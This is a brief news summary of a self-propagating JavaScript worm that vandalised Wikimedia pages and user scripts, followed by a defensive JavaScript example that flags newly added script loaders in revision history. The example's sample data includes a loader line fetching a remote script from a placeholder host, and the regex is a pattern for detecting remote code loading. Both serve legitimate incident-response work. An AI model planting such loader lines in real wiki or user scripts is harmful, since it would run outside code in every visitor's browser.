
Wikimedia Foundation hit by JavaScript worm; editing restricted


Coverage from Bleeping Computer indicates that the Wikimedia Foundation experienced a significant security incident involving a self-propagating JavaScript worm that vandalized pages and altered user scripts across multiple wikis, including Wikipedia.

The incident began when a malicious script, hosted on Russian Wikipedia and allegedly linked to previous attacks, was executed. This script modified a global JavaScript file, causing it to spread as a worm. The worm injected malicious loaders into user scripts and the global MediaWiki:Common.js file. Once a user's script was modified, it automatically loaded the malicious script, and if that user had sufficient privileges, the worm also infected the global script, affecting all users.

The worm also edited random pages, inserting hidden JavaScript loaders. Approximately 3,996 pages were modified, and around 85 users had their common.js files overwritten before Wikimedia engineers temporarily restricted editing to investigate and revert the changes.

Source: Bleeping Computer
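For responders reviewing edit history after propagation like that described above, the following added example (not code from Wikimedia or the original report) clusters script-loader targets newly introduced by edits and flags any that reach a site-wide script or appear under several editors. The loader call names are common MediaWiki script-loading functions assumed here for illustration, and the revision records, user names, URL and `minEditors` threshold are constructed.

```javascript
// Added example: cluster newly added script-loader targets across revisions.
// Assumption: these are common MediaWiki script-loading calls, not indicators from the incident.
const LOADER_CALL = /(?:mw\.loader\.load|importScript(?:URI)?|\$\.getScript)\s*\(\s*(['"])(.*?)\1/g;

function loaderTargets(text) {
  return new Set([...text.matchAll(LOADER_CALL)].map((m) => m[2]));
}

function scopeOf(title) {
  if (/^MediaWiki:.+\.js$/i.test(title)) return "site-js";   // runs for all users
  if (/^User:[^/]+\/.+\.js$/i.test(title)) return "user-js"; // runs for one user
  return "content";
}

// revisions: [{title, editor, before, after}]; minEditors is an assumed threshold.
function findSpreadingLoaders(revisions, minEditors = 3) {
  const byTarget = new Map();
  for (const rev of revisions) {
    const old = loaderTargets(rev.before);
    for (const target of loaderTargets(rev.after)) {
      if (old.has(target)) continue; // keep only loaders this edit introduced
      const entry = byTarget.get(target) ||
        { target, editors: new Set(), titles: [], siteWide: false };
      entry.editors.add(rev.editor);
      entry.titles.push(rev.title);
      if (scopeOf(rev.title) === "site-js") entry.siteWide = true;
      byTarget.set(target, entry);
    }
  }
  return [...byTarget.values()]
    .filter((e) => e.siteWide || e.editors.size >= minEditors)
    .map((e) => ({ target: e.target, editors: e.editors.size, titles: e.titles, siteWide: e.siteWide }));
}

// Constructed sample data (placeholder user names and URL).
const LOADER = "mw.loader.load('https://wiki.example.invalid/loader.js');";
const SAMPLE_REVISIONS = [
  { title: "User:ExampleA/common.js", editor: "ExampleA", before: "", after: LOADER },
  { title: "User:ExampleB/common.js", editor: "ExampleB", before: "// notes", after: "// notes\n" + LOADER },
  { title: "MediaWiki:Common.js", editor: "ExampleC", before: "/* site */", after: "/* site */\n" + LOADER },
  { title: "Sample article", editor: "ExampleB", before: "Sample text.", after: "Sample text.\n" + LOADER },
  { title: "User:ExampleD/common.js", editor: "ExampleD", before: "", after: "importScript('User:ExampleD/tools.js');" },
];

console.log(JSON.stringify(findSpreadingLoaders(SAMPLE_REVISIONS), null, 2));
```

Each flagged target comes with the list of titles it was added to, which doubles as the revert list for that loader.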
